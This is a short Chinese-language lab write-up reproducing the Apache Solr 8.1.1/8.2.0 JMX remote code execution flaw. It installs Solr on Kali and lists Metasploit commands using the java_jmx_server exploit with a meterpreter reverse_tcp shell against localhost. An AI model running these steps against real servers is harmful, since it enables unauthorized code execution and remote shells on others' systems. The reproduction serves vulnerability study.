Apache Solr JMX服务 RCE 漏洞复现

Apache Solr的8.1.1和8.2.0版本的自带配置文件solr.in.sh中存在不安全的选项ENABLE_REMOTE_JMX_OPTS="true"。 如果受害者使用了该默认配置，则会在默认端口18983开放JMX服务，且默认未开启认证。 任何可访问此端口的攻击者可利用此漏洞向受影响服务发起攻击，执行任意代码。

Apache Solr8.1.1和8.2.0版本

如果受害者使用了该默认配置，则会在默认端口18983开放JMX服务，且默认未开启认证。 任何可访问此端口的攻击者可利用此漏洞向受影响服务发起攻击，执行任意代码。

Solr 8.20 、Java环境 、kali系统

因为 Solr 8.20 需要java环境支持，而kali系统本身内置openjdk版本（我的是java10），所以我们无需另外下载java环境。

安装 Apache Solr 8.20：

wget https://mirrors.tuna.tsinghua.edu.cn/apache/lucene/solr/8.2.0/solr-8.2.0.zip

unzip solr-8.2.0.zip

切换到bin目录启动Solr

./solr  start  -force

成功访问ip:8983(Solr默认端口)

我们可以用MSF中的exploit/multi/misc/java_jmx_server模块进行漏洞复现。 （我是用kali搭建漏洞环境原因，使用127.0.0.1本地地址作为攻击目标）

use exploit/multi/misc/java_jmx_serverset RHOST 127.0.0.1set RPORT 18983

set payload java/meterpreter/reverse_tcpset LHOST 127.0.0.1set LPORT  4444

执行完成，发现成功建立连接